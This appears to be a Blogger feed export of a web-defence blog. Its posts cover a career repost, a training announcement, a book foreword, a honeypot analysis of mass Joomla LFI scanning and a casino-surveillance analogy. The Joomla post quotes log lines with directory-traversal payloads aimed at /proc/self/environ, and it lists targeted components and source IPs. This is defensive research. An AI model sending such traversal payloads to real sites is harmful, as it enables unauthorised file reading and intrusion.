tag:blogger.com,1999:blog-53615239042375972062024-03-15T21:10:17.145-04:00Tactical Web Application Security<b>Tac-ti-cal</b>: of or relating to combat tactics: of or occurring at the battlefront <<i>a tactical defense</i>>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.comBlogger68125tag:blogger.com,1999:blog-5361523904237597206.post-31663182506832562822023-07-19T17:01:00.001-04:002023-07-19T17:02:49.438-04:00Eight Year Anniversary at Akamai Blog Reposting - I Once Was Blind but Now I Can See<p> </p><span id="docs-internal-guid-732865d3-7fff-4c6b-42e4-a5991f4675ab"><div style="line-height: 1.2; margin-bottom: 0pt; margin-top: 12pt; text-align: left;">I recently celebrated my eighth work anniversary at Akamai so I thought I would repost this blog post I made shortly after joining Akamai. It is as true today as ever.</div><h1 dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 12pt; text-align: center;"><span face="Calibri, sans-serif" style="color: #2e75b5; font-size: 16pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space-collapse: preserve;">I Once Was Blind but Now I Can See</span></h1><h2 dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 2pt; text-align: center;"><span face="Calibri, sans-serif" style="color: #2e75b5; font-size: 13pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space-collapse: preserve;">CDN-based WAF + Big Data Intelligence is a Gold Mine for This Security Researcher</span></h2><p dir="ltr" style="background-color: white; line-height: 2.16; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 19pt;"><span face="Ubuntu, sans-serif" style="background-color: transparent; color: #3a444a; font-size: 10.5pt; font-style: italic; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">CDN-based WAF + Big Data Intelligence is a Gold Mine for This Security Researcher</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">I am frequently asked by friends and colleagues why I joined Akamai's Threat Research Team. I can boil it down to three main reasons: </span><span face="Calibri, sans-serif" style="font-size: 12pt; font-style: italic; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">People, Technology and Data</span><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">. </span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">The first reason is </span><span face="Calibri, sans-serif" style="font-size: 12pt; font-style: italic; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">people</span><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">. Don't get me wrong. This is not a slight on my former colleagues. They were all great. The fact is that, for me, I was missing being stimulated and challenged by other web application defense security researchers that live and breathe web application threats. I found it here in Akamai's Threat Research Team. At the top of that list is Ory Segal. Ory and I have known each other for years going back to our time as board members for the Web Application Security Consortium (WASC). We have some similar backgrounds with regards to leading WAF and DAST research teams and we had always toyed with the idea of someday working together. Well, that day finally came last June. It is exciting for me to work with Ory and to try and tackle these challenging web application security issues. Besides Ory, there are also many other talented security researchers on the team and I want to mention two of them specifically. Or Katz was an old colleague of mine from Breach Security days and I am glad to work with him again. He excels at taking a larger view of our dataset and identifying attack patterns and new malicious campaigns. Ezra Caltum has also been awesome to work with. We share a common bond that can only be understood after going through the fires of having to create and maintain large scale WAF signatures! The excellence of people does not end there and extends outside of the Threat Research Team. The engineers in charge of the Ghost platform are incredible and the management team is dynamic and forward thinking. All in all, it is a fantastic group of people to work with. </span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">The second reason I joined Akamai is the </span><span face="Calibri, sans-serif" style="font-size: 12pt; font-style: italic; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">technology</span><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">. My main area of research focus is for the Kona Security product line including WAF. I have spent more than a decade working with both open source (ModSecurity) and commercial (Breach Security/Trustwave) WAFs. From a security researcher's perspective, one of the largest issues I had was a lack of visibility. The main challenge was with the traditional drop-ship WAF-in-a-box model. We would sell WAF servers to customers and then we would never see any actual data from them unless there was a false positive problem. This lack of real-time alert data was very frustrating. How was I supposed to verify if the protection logic was working? How was I supposed to identify new attack techniques and trends without access to real data? I tried to make due by utilizing web honeypot systems and they did provide some level of value but nothing can compare to the real thing. This situation made me very envious of CDN/Cloud-based WAFs. Now this is the way to go! There are many advantages to this deployment model. This model is more agile from a security perspective. What if there is a new 0-day vulnerability or some new attack tool that is released? How quickly can your WAF vendor respond and get protections out to customers? With a cloud-based WAF, that time-to-respond metric is much lower than drop-ship WAFs. </span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">The final reason that I joined Akamai is access to </span><span face="Calibri, sans-serif" style="font-size: 12pt; font-style: italic; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">data</span><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">. Data is gold to security researchers and here at Akamai, we have the mother load of data in our Cloud Security Intelligence (CSI) big data platform. CSI holds more than 4 petabytes of intelligence data. For me, when I used to be starving for any scraps of web attack data to feed on, getting access to CSI data is like the all-you-can-eat buffet! Now I am able to see attacks that span across multiple customer domains, track botnets that are part of DDoS campaigns and even attackers attempting to validate stolen login credentials. </span><span face="Calibri, sans-serif" style="font-size: 12pt; font-style: italic; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">Once I was blind but now I can see</span><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">... And I am loving every minute of it! </span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">So, what does all this mean to you? If you were a fan of my previous web application security/defense posts on the Trustwave SpiderLabs blog, then you are going to be happy because I am planning to start blogging again here on the Akamai blog. It took me a while to ramp up here and to finish work on some high priority goals but I am now ready to get back to blogging. Gotta run for now though as there is a distributed SQL Injection botnet I have to analyze! </span></p><div><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><br /></span></div></span>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-60645595399071289472014-02-19T09:04:00.002-05:002014-02-19T09:04:31.031-05:00New 4-day "Web Application Defender Cookbook LIVE" class at BlackhatUSA 2014<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-y9MYCckK9p4/UwS0iq9kxvI/AAAAAAAAATI/p-GkeaJuJ5o/s1600/Screen+Shot+2014-02-19+at+8.40.05+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-y9MYCckK9p4/UwS0iq9kxvI/AAAAAAAAATI/p-GkeaJuJ5o/s1600/Screen+Shot+2014-02-19+at+8.40.05+AM.png" height="387" width="640" /></a></div>
<br />
<a href="https://www.blackhat.com/us-14/training/web-application-defenders-cookbook-live.html" target="_blank">Registration is now OPEN</a> for my new, updated class based on <a href="http://www.amazon.com/Web-Application-Defenders-Cookbook-Protecting/dp/1118362187" target="_blank">my book</a>. Here are some comments from past students who participated in the 2-day version of the class at the recent <a href="http://2013.appsecusa.org/2013/training/index.html" target="_blank">OWASP AppSecUSA 2013 conference</a> in New York:<br />
<br />
<br />
<ul>
<li><span style="color: #333333;"><span style="font-family: inherit;"><i>I learned more in 2 days than I would have in weeks on my own. The class was definitely worth it. Ryan
Barnett is a great educator, and an amazing security resource. </i></span></span></li>
<li><span style="color: #333333;"><span style="font-family: inherit;"><i>It will take me some time to process all of the valuable information and am glad I was able to walk
away with his book!</i></span></span></li>
<li><span style="color: #333333;"><span style="font-family: inherit;"><i>I liked learning about different threats to a web application and how I can see them. I liked that the
class had extensive labs, and some higher level content.</i></span></span></li>
<li><span style="color: #333333;"><span style="font-family: inherit;"><i>I enjoyed the hands on labs and the self paced nature of the entire course.</i></span></span></li>
<li><i>I’m glad I chose your class instead. The material was presented clearly and it was great working through the examples with you available for answering questions. I was really happy with the ratio of lecture to labs. It gave us a good amount of hands-on time. Also, besides having the book as a take-away, we had VMs to look at and work through once back at our office. I can immediately put to use what I learned in the class. My only issue was having the length of the class be only 2 days. I would assume it was a constraint of the conference schedule. If it class could be expanded to 3 or 4 days, it would be fantastic. I really appreciated your relaxed teaching style and eagerness to answer our questions.</i></li>
</ul>
<br />
<br />
Hope to see you all in Las Vegas!<br />
<br />Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-60922295230565076762012-12-04T10:19:00.002-05:002012-12-04T10:32:15.652-05:00My New Book: The Web Application Defender's CookbookI am excited to announce that my new book entitled "<a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118362187.html" target="_blank">The Web Application Defender's Cookbook: Battling Hackers and Defending Users</a>" is now available for purchase! This book is a culmination of many years of defending both government and commercial web applications. Just to be clear, this is not a "WAF" book. Yes, I utilized the open source ModSecurity WAF tool for examples however the techniques used within the book could be implemented through other technical means such as implementing <a href="https://www.owasp.org/index.php/Category:OWASP_AppSensor_Project" target="_blank">OWASP AppSensor Detection Points</a> within the application itself.<br />
<br />
<br />
<div class="p1">
<a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118362187.html" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="200" src="http://4.bp.blogspot.com/-f0Z8zQyTAIE/UL4Kk_CPA-I/AAAAAAAAAQA/79M0xK-2_wo/s200/book-cover.png" width="157" /></a>Quite simply, the goal of this book is <i><b>to make your web applications more difficult to hack</b></i>. Web applications—or any software, for that matter—will never be completely secure and free from defects. It is only a matter of time before a determined attacker will find some vulnerability or misconfiguration to exploit and compromise either your site or one of its users. You should take a moment to come to terms with this truth before progressing. Many people wrongly assume that hiring “smart” developers or deploying commercial security products will magically make their sites “hacker proof.” Sadly, this is not reality. A more realistic goal for web application security is to gain visibility into your web transactions and to make your web applications more <i><b>hacker resistant</b></i>. If you can force any would-be attackers to spend a significant amount of time probing your site, looking for vulnerabilities, you will widen the window of opportunity for operational security personnel to initiate proper response methods.</div>
<div class="p1">
<br /></div>
<div class="p1">
This book arms you with information that will help you increase your web applications’ resistance to attacks. You will be able to perform the following critical web defensive techniques:</div>
<div class="p1">
</div>
<ul>
<li>Implement full HTTP auditing for incident response.</li>
<li>Utilize a process to mitigate identified vulnerabilities.</li>
<li>Deploy web tripwires (honeytraps) to identify malicious users.</li>
<li>Detect when uses are acting abnormally.</li>
<li>Analyze uploaded files and web content for malware.</li>
<li>Recognize when web applications leak sensitive user or technical data.</li>
<li>Respond to attacks with varying levels of force.</li>
</ul>
<br />
<div class="p1">
Here is the Foreword from the book which was written by my friend <a href="https://twitter.com/jeremiahg" target="_blank">Jeremiah Grossman</a>:</div>
<br />
<blockquote>
<i><span class="s1">A d</span>efender, the person responsible for protecting IT systems from being compro- mised, could just as easily be the first line of defense as the last line. In fact, a defender working for an average organization might be the only line of defense—the only thing standing between the bad guy and a headline-making data breach. Worse yet, perhaps the incident doesn’t make headlines, and no one, including the defender, is the wiser.</i> </blockquote>
<blockquote>
<i>Either way, when whatever crazy new Web 2.0 Ajax-laced HTML5-laden application has traversed the software development life cycle and successfully made it past the QA gate, when the third-party penetration testers are long gone, after management has signed off on all the security exceptions, and the application has been released to production, with or without the defender’s knowledge or consent, “security” then becomes entirely the defender’s responsibility. Rest assured that vulnerabilities will remain or will be introduced eventually. So, when all is said and done, a defender’s mission is to secure the insecure, to identify incoming attacks and thwart them, and to detect and contain breaches.</i> </blockquote>
<blockquote>
<i>That’s why there should be no doubt about the importance of the role of a defender. Defenders often safeguard the personal data of millions of people. They may protect mil- lions, perhaps billions, of dollars in online transactions and the core intellectual property of the entire business. You can bet that with so much on the line, with so much valuable information being stored, someone will want to steal it. And the bigger and more high profile the system, the more sustained and targeted the incoming attacks will be.</i> </blockquote>
<blockquote>
<i>Making matters even more challenging, the bad guys have the luxury of picking their shots. They may attack a system whenever they want to, or not. A Defender’s job is 24/7/365, holidays, weekends, vacation days. The system must be ready, and the defender must be ready, at all times.</i> </blockquote>
<blockquote>
<i>A defender’s job description could read much like Ernest Shackleton’s famous advertisement when he was looking for men to accompany him on his next Antarctic expedition:</i> </blockquote>
<blockquote>
<b><i>Men wanted for hazardous journey. Low wages, bitter cold, long hours of complete darkness. Safe return doubtful. Honour and recognition in event of success.</i> </b></blockquote>
<blockquote>
<i>A defender’s success really comes down to understanding a few key points about the operational environment in which he or she works:</i><br />
<ul>
<li><i>Web sites are often deployed in such a way that they cannot be adequately mirrored in development, QA, or even staging. This means that the real and true security posture, the real and true risk to the business, can be fully grasped only when it hits production and becomes an actual risk. As such, defenders must be able to think on their feet, be nimble, and react quickly.</i></li>
</ul>
<ul>
<li><i>Defenders will find themselves responsible for protecting web sites they did not create and have little or no insight into or control over. Management may not respect security and may be unwilling to fix identified vulnerabilities in a timely fashion, and that could be the long-term standard operating procedure. And maybe this is the right call, depending on business risk and the estimated cost of software security. Whatever the case may be, defenders must be able to identify incoming attacks, block as many exploits as they can, and contain breaches.</i></li>
</ul>
<ul>
<li><i>Fighting fires and responding to daily threats must be an expected part of the role. Whether the business is fully committed to software security is immaterial, because software will always have vulnerabilities. Furthermore, everyone gets attacked eventually. A defender never wants to be late in seeing an attack and the last one to know about a breach. For a defender, attack identification and response time are crucial.</i></li>
</ul>
<ul>
<li><i>Defenders, because they are on the front lines, learn a tremendous amount about the application’s risk profile and the necessary security readiness required to thwart attackers. This intelligence is like gold when communicated to developers who are interested in creating ever more resilient systems. This intelligence is also like gold when informing the security assessment teams abount what types of vulnerabilities they should focus on first when testing systems in either QA or production. Everyone needs actionable data. The best defenders have it.</i></li>
</ul>
<i>Putting these practices to use requires specialized skills and experience. Normally, aspiring defenders don’t get this type of how-to instruction from product README files or FAQs. Historically, the knowledge came from conversations with peers, blog posts, and mailing list conversations. Information scattered around the Internet is hard to cobble together into anything actionable. By the time you do, you might already have been hacked. Maybe that’s why you picked up this book. Clearly web-based attackers are becoming more active and brazen every day, with no signs of slowing.</i> </blockquote>
<blockquote>
<i>For a Defender to be successful, there is simply no substitute for experience. And this kind of experience comes only from hour after hour, day after day, and year after year of being on the battlefield, learning what strategies and tactics work in a given situation. This kind of experience certainly doesn’t come quickly or easily. At the same time, this kind of information and the lessons learned can be documented, codified, and shared. This is what Ryan Barnett offers in this book: recipes for defense—recipes for success.</i> </blockquote>
<blockquote>
<i>To all defenders, I leave you in Ryan’s accomplished and capable hands. His reputation speaks for itself. Ryan is one of the original defenders. He has contributed more than anyone else in web security to define the role of the defender. And he’s one of the best field practitioners I’ve ever seen. Good luck out there!</i> </blockquote>
<blockquote>
<i>Jeremiah Grossman<br />Chief Technology Officer WhiteHat Security, Inc.</i></blockquote>
Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com1tag:blogger.com,1999:blog-5361523904237597206.post-21892835035391760602011-11-18T11:46:00.003-05:002012-01-25T10:52:43.643-05:00Mass Joomla Component LFI Attacks Identified<h1>Joomla Component LFI Vulnerabilities</h1><p>Joomla has hundreds of Controller components. Check out the <a href="http://extensions.joomla.org/" target="_self">Joomla Extension site</a> for examples. Unfortunately, the vast majority of these components have LFI vulnerabilities. The vulnerability details are pretty much the same -</p><ul><li>The vulnerable page is "index.php".</li><br /><li>The "option" parameter is set to "com_xxxxxx" where xxxx is the vulnerable component name.</li><br /><li>Input passed via the "controller" parameter is not properly verified before being used to include files. </li><br /><li>By appending URL-encoded NULL bytes, an attacker can specify any arbitrary local file.</li><br /></ul><p>Here is an example <a href="http://osvdb.org/search/search?search%5Bvuln_title%5D=Joomla+Controller+Parameter+Traversal+Local+File+Inclusion&search%5Btext_type%5D=alltext" target="_self">OSVDB Search Query for a listing of these vulnerabilities</a>.</p><p><a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b0153932f4111970b-pi"><img title="Screen shot 2011-11-17 at 10.27.01 AM" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b0153932f4111970b-800wi" border="0" width="85%" height="85%" alt="Screen shot 2011-11-17 at 10.27.01 AM" /></a></p><h1>Honeypot Attack Probes Identified</h1><p>Our daily honeypot analysis has identified a mass scanning campaign aimed at various Joomla Component Local File Inclusion (LFI) Vulnerabilities. Here are a few example attacks taken from today's honeypot logs:</p><pre>109.75.169.20 - - [17/Nov/2011:17:48:15 +0900] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ00 HTTP/1.1" 404 224<br />174.122.220.10 - - [17/Nov/2011:00:21:32 +0100] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../..//proc/self/environ00 HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"<br />72.47.211.229 - - [17/Nov/2011:10:14:27 +0900] "GET /index.php?option=com_cvmaker&controller=../../../../../../../../../../../../..//proc/self/environ00 HTTP/1.1" 404 216<br />180.235.131.131 - - [17/Nov/2011:01:34:54 +0900] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../..//proc/self/environ00 HTTP/1.1" 404 222</pre><p>Notice that various components are targeted in the "option" parameter and that the a directory traversal attack is used in the "controller" parameter. The LFI data is attempting to enumerate the OS shell environment data.</p><h2>Attack Statistics</h2><ul><li>Number of attacks seen: 1538</li><br /><li>Number of unique attack sources: 45</li></ul><h2>Top 25 Joomla Component LFI Attacker Sources</h2><br /><table><tbody><tr><th># of Attacks</th><th>IP Address</th><th>Country Code</th><th>Country Name</th><th>Region</th><th>Region Name</th><th>City</th></tr><tr><td>491</td><td>180.235.131.131</td><td>AU</td><td>Australia</td><td> </td><td> </td><td> </td></tr><tr><td>95</td><td>210.173.154.35</td><td>JP</td><td>Japan</td><td> </td><td> </td><td> </td></tr><tr><td>86</td><td>74.50.25.165</td><td>US</td><td>United States</td><td>CA</td><td>California</td><td>Anaheim</td></tr><tr><td>80</td><td>91.121.87.48</td><td>FR</td><td>France</td><td> </td><td> </td><td> </td></tr><tr><td>67</td><td>69.27.109.40</td><td>CA</td><td>Canada</td><td>SK</td><td>Saskatchewan</td><td>Saskatoon</td></tr><tr><td>58</td><td>46.105.98.146</td><td>FR</td><td>France</td><td> </td><td> </td><td> </td></tr><tr><td>58</td><td>180.151.1.68</td><td>IN</td><td>India</td><td>07</td><td>Delhi</td><td>New Delhi</td></tr><tr><td>51</td><td>67.23.229.237</td><td>US</td><td>United States</td><td>NY</td><td>New York</td><td>New York</td></tr><tr><td>42</td><td>64.92.125.26</td><td>US</td><td>United States</td><td>CO</td><td>Colorado</td><td>Denver</td></tr><tr><td>42</td><td>182.255.0.200</td><td>ID</td><td>Indonesia</td><td> </td><td> </td><td> </td></tr><tr><td>39</td><td>82.192.87.86</td><td>NL</td><td>Netherlands</td><td>07</td><td>Noord-Holland</td><td>Amsterdam</td></tr><tr><td>38</td><td>174.122.220.10</td><td>US</td><td>United States</td><td>TX</td><td>Texas</td><td>Houston</td></tr><tr><td>37</td><td>178.162.231.59</td><td>CA</td><td>Canada</td><td> </td><td> </td><td> </td></tr><tr><td>36</td><td>72.47.211.229</td><td>US</td><td>United States</td><td>CA</td><td>California</td><td>Culver City</td></tr><tr><td>33</td><td>122.201.80.95</td><td>AU</td><td>Australia</td><td>02</td><td>New South Wales</td><td>Sydney</td></tr><tr><td>32</td><td>174.37.16.78</td><td>US</td><td>United States</td><td>TX</td><td>Texas</td><td>Dallas</td></tr><tr><td>31</td><td>64.13.224.234</td><td>US</td><td>United States</td><td>CA</td><td>California</td><td>Culver City</td></tr><tr><td>27</td><td>109.75.169.20</td><td>GB</td><td>United Kingdom</td><td> </td><td> </td><td> </td></tr><tr><td>25</td><td>65.98.23.170</td><td>US</td><td>United States</td><td>CA</td><td>California</td><td>San Francisco</td></tr><tr><td>25</td><td>46.20.45.50</td><td>DE</td><td>Germany</td><td> </td><td> </td><td> </td></tr><tr><td>24</td><td>193.106.93.131</td><td>RU</td><td>Russian Federation</td><td> </td><td> </td><td> </td></tr><tr><td>16</td><td>85.36.63.35</td><td>IT</td><td>Italy</td><td> </td><td> </td><td> </td></tr><tr><td>11</td><td>71.17.4.161</td><td>CA</td><td>Canada</td><td>SK</td><td>Saskatchewan</td><td>Lloydminster</td></tr><tr><td>10</td><td>50.73.66.4</td><td>US</td><td>United States</td><td> </td><td> </td><td> </td></tr><tr><td>9</td><td>173.245.78.42</td><td>US</td><td>United States</td><td>CA</td><td>California</td><td>Fremont</td></tr><tr><td>8</td><td>92.60.124.128</td><td>ES</td><td>Spain</td><td> </td><td> </td><td><br /><br /></td></tr></tbody></table><br /><h2>Joomla Components Targeted</h2><p>Here is a listing of the various Joomla components that were targeted in today's attacks:</p><pre>com_bca-rss-syndicator<br />com_ccnewsletter<br />com_ckforms<br />com_cvmaker<br />com_datafeeds<br />com_dioneformwizard<br />com_dwgraphs<br />com_fabrik<br />com_gadgetfactory<br />com_ganalytics<br />com_gcalendar<br />com_hsconfig<br />com_if_surfalert<br />com_janews<br />com_jfeedback<br />com_joomlapicasa2<br />com_joomlaupdater<br />com_joommail<br />com_jshopping<br />com_juliaportfolio<br />com_jvehicles<br />com_jwhmcs<br />com_linkr<br />com_mediqna<br />com_mmsblog<br />com_mscomment<br />com_mtfireeagle<br />com_ninjarsssyndicator<br />com_onlineexam<br />com_orgchart<br />com_pcchess<br />com_properties<br />com_rokdownloads<br />com_rpx<br />com_s5clanroster<br />com_sbsfile<br />com_sectionex<br />com_shoutbox<br />com_simpledownload<br />com_smestorage<br />com_spsnewsletter<br />com_svmap<br />com_sweetykeeper<br />com_userstatus<br />com_webeecomment<br />com_weberpcustomer<br />com_zimbcomment</pre><h1>Recommendations</h1><p>If you are running Joomla applications, you should ensure that you are keeping up-to-date on patches and updates.</p><h2>OWASP Joomla Vulnerability Scanner</h2><p>OWASP has an open source <a href="https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project" target="_self">Joomla Vulnerability Scanner Project</a> that you should check out and run against your site.</p><h2>OWASP ModSecurity Core Rule Set</h2><p>The <a href="https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project" target="_self">OWASP ModSecurity CRS</a> includes generic directory traversal attack detections which should provide base level protections.</p><h2>Commercial ModSecurity Rules From Trustwave</h2><p>We have numerous virtual patches for Joomla applications including these Controller parameter LFI attacks in our <a href="http://www.modsecurity.org/projects/commercial/rules/" target="_self">commercial rules feed</a>.</p>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-71258018001123657342011-08-07T01:06:00.000-04:002011-08-07T03:23:17.836-04:00What Web Application Security Monitoring Can Learn From Casino Surveillance<a href="http://photos.pokerplayer.co.uk/images/front_picture_library_UK/dir_4/total_gambler_2376_15.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><blockquote></blockquote><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 428px; height: 285px;" src="http://photos.pokerplayer.co.uk/images/front_picture_library_UK/dir_4/total_gambler_2376_15.jpg" border="0" alt="" /></a><div>After spending this week at the Blackhat/DefCon 19 conferences, I was struck with this thought - Web application security monitoring could take a few pointers from Casino Surveillance.
<br />
<br /><span style="font-weight: bold;">Network Security and Banks</span>
<br />Traditional network security seems to have a similar security posture philosophy as brick-and-mortar banks - <b>K</b><span style="font-weight: bold;">eep the bad buys out.</span> For banks, the goal is to keep the money in the vaults to make sure that criminals do not obtain access to it. Network security similarly aims is to keep outsiders from accessing internal systems and ports.</div><div>
<br /><b>Web Application Security and Casino Surveillance</b></div><div>Web application security and monitoring, on the other hand, is very similar to Casino Surveillance in that the goal is not to keep the bad guys out since - <span style="font-weight: bold;">you have to let the people play.</span> The very nature of both a Casino and a web application is to allow people access to the resources. The issue is not as much <b><i>who you are</i></b> but rather <b><i>what you are doing</i></b>. Yes, there is security at Casinos but they are not guarding the front door and checking IDs to get in the front door. They have to let people in to play the various games and then they need to watch them very closely looking for abnormal behaviors. While there are certain similarities to their operating model, there is a stark contrast to their monitoring capabilities. The overwhelming majority of web applications have not been properly instrumented for logging transactional data and alerting on suspicious behaviors. This is where, I believe, web applications could learn a lesson or two from Casinos.</div><div>
<br /></div><div><meta charset="utf-8"><span style="font-weight: bold; ">Surveillance is not a luxury</span>
<br />Implementation of proper surveillance inside a Casino is not a luxury but is actually mandated by law (example <a href="http://gaming.nv.gov/stats_regs/reg5_survel_stnds.pdf">Nevada Gaming Commission document on surveillance standards</a>). While the <a href="https://www.pcisecuritystandards.org/documents/pci_dss_v2.pdf">PCI Digital Security Standard (DSS)</a> does outline some audit details in Requirement 10, it still falls short on specific items that should be logged and/or flagged in web transactions. The <a href="https://www.owasp.org/index.php/Category:OWASP_AppSensor_Project">OWASP AppSensor Project</a> is the closest resource I have found that highlights the types of events that web applications should be logging and alerting on. As good as AppSensor is for describing the types of events to look for, it does not cover HTTP auditing itself.</div><meta charset="utf-8"><div>
<br /></div><div><meta charset="utf-8"><span style="font-weight: bold; ">Proper Coverage</span>
<br />Casino surveillance cameras must be able to observe all aspects of the games including the equipment, staff and players. This includes the table layouts, the rack, chips and even view player's faces. Here is one section that outlines exactly what parts of table games must be covered for surveillance purposes:</div><div>
<br /></div><div><div></div><blockquote><div><i><b>STANDARD 2 </b></i></div><div><i><b>REQUIRED SURVEILLANCE COVERAGE: TABLE GAMES </b></i></div><div><i>1. The surveillance system of all licensees operating three (3) or more table games must </i><i>possess the capability to monitor and record: </i></div><div><i>(a) Each table game area, with sufficient clarity to identify patrons and dealers; and </i></div><div><i>(b) Each table game surface, with sufficient coverage and clarity to simultaneously view the </i><i>table bank and determine the configuration of wagers, card values and game outcome. </i></div><div><i>2. Each progressive table game with a potential progressive jackpot of $25,000 or more must </i><i>be recorded and monitored by dedicated cameras that provide coverage of: </i></div><div><i>(a) The table surface, sufficient that the card values and card suits can be clearly identified; and </i></div><div><i>(b) An overall view of the entire table with sufficient clarity to identify patrons and dealer. </i></div><div><i>(c) A view of the progressive meter jackpot amount. If several tables are linked to the same </i><i>progressive jackpot meter, only one meter need be recorded.</i></div></blockquote></div><meta charset="utf-8"><div>In typical web application security logging, only a small subset of data is actually logged or reviewed. The data capture by most web servers is not adequate for conducting incident response. For example, most times, request and response bodies are excluded from logging which leaves a gaping blind spot. Anton Chuvakin and Gunnar Peterson have a very good paper entitled "<a href="http://arctecgroup.net/pdf/howtoapplogging.pdf">How to do Application Logging Right</a>" that is certainly worth a read.</div><div>
<br /><span style="font-weight: bold;">Combination of recording and live analysis</span>
<br />Casino cameras record all data and this information is stored for later use such as settling game disputes. If there are any problems, they can review the tapes to identify what happened. In addition to the recorded data, all Casinos have staff who are constantly monitoring and moving cameras to zero in on suspicious activity. In web application security monitoring, this is similar to having alerting systems based on rules such as those in AppSensor and then supplementing that with full audit logging. When an analyst identifies an initial event of interest, they can then utilize the full HTTP audit log data for correlations.<b>
<br /></b>
<br /><span style="font-weight: bold;">Just Doesn't Look Right (JDLR)</span>
<br />Following proper procedures in Casinos is absolutely critical for identifying scams and cheating behavior. When staff or players deviate from these procedures, then something just doesn't look right (jdlr) and the surveillance staff can then call up increased camera coverage to focus in on the suspects. This is somewhat similar to scenarios where web application firewalls have automated learning/profiling and create positive security rules for the expected web application behavior. If a client deviates from this profile, then anomaly events can be generated. It is possible to then increase the audit logging and "tag" these clients actions for recording their traffic.
<br />
<br /><span style="font-weight: bold;">Two Types of Crimes</span>
<br />Casinos typically have two types of crimes, crimes against the casino and crimes against the patrons. Crimes against the casino might be where scam artists work in teams to distract staff and pass cards between themselves or possible using tools/electronics against the computerized slot machines. In web application security, these would be similar to SQL Injection types of attacks where the attacker is aiming to attack the application itself to steal data.
